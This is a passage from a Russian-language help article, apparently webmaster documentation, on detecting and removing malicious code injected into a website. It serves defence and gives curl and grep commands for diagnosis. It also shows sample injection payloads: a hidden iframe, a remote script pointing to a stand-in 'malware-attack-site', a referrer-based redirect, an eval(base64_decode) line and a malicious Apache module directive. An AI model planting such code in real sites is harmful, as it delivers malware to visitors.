Тип вредоносного ПО: внедрение кода

Что значит, если в Google Search Console для страниц отображается статус "Внедрение кода"?

Это означает, что злоумышленники добавили на страницы вашего сайта вредоносный код, например для отображения окон iframe с переадресацией на опасные ресурсы.

Подробнее о том, как оценить масштаб внедрения вредоносного ПО...

Как выявить заражение такого типа?

Во-первых, не используйте браузер для просмотра зараженных страниц вашего сайта. Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров.

Чтобы проверять события, попробуйте отправлять запросы HTTP с помощью cURL или Wget (например, для загрузки страницы). Эти бесплатные инструменты позволяют диагностировать переадресацию и указывать любые URL перехода или агенты пользователя. Хакеры зачастую целенаправленно атакуют конкретных людей, определяя их по используемым агентам пользователя и URL перехода. Это позволяет злоумышленникам избежать обнаружения владельцами сайтов или антивирусным ПО. Вы сможете использовать указанные выше инструменты только в том случае, если сайт в рабочем состоянии.

Пример запроса:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
С указанием URL:
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Затем войдите в вашу файловую систему. Проверьте все ресурсы, связанные с URL, по которым был внедрен вредоносный код. Ниже приведены его примеры.

  • iframe с переадресацией на опасный сайт:
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • код в JavaScript или на другом скриптовом языке, который вызывает и запускает скрипты с опасного сайта:
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • скрипт, который перенаправляет браузер на опасный сайт:
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • замаскированный вредоносный код:
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • файлы общих объектов, предназначенные для произвольного добавления вредоносного кода в безвредные скрипты:
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Проверьте все подозрительные разделы кода на сайте. Чтобы найти код окон iframe, можно выполнить поиск по запросу [iframe]. Другие полезные ключевые слова: script, eval и unescape. В системах Unix используйте следующую команду:

$grep -irn "iframe" ./ | less

Как удалить с сайта вредоносное ПО, использующее внедрение кода?

Завершив подготовку, выполните шаг 7 процедуры по восстановлению взломанных сайтов. Например, вы можете заменить пораженные файлы надежными резервными или удалить с каждой страницы вредоносный код, а также все связанные с ним скрипты и файлы. Если вы при этом будете редактировать файлы настроек сервера, перезагрузите его, чтобы применить изменения.

Обратите внимание, что удаление внедренного хакером кода не исправляет исходную уязвимость, которая позволила взломать ваш сайт. Если не устранить ее, атака может произойти снова. Подробнее об удалении с сайта вредоносного ПО различных типов читайте в этой статье, в частности в разделе "Оцените масштаб вмешательства в файловую систему" шага 5, на котором выявляется уровень внедрения вредоносного ПО.

Была ли эта статья полезна?
Как можно улучшить эту статью?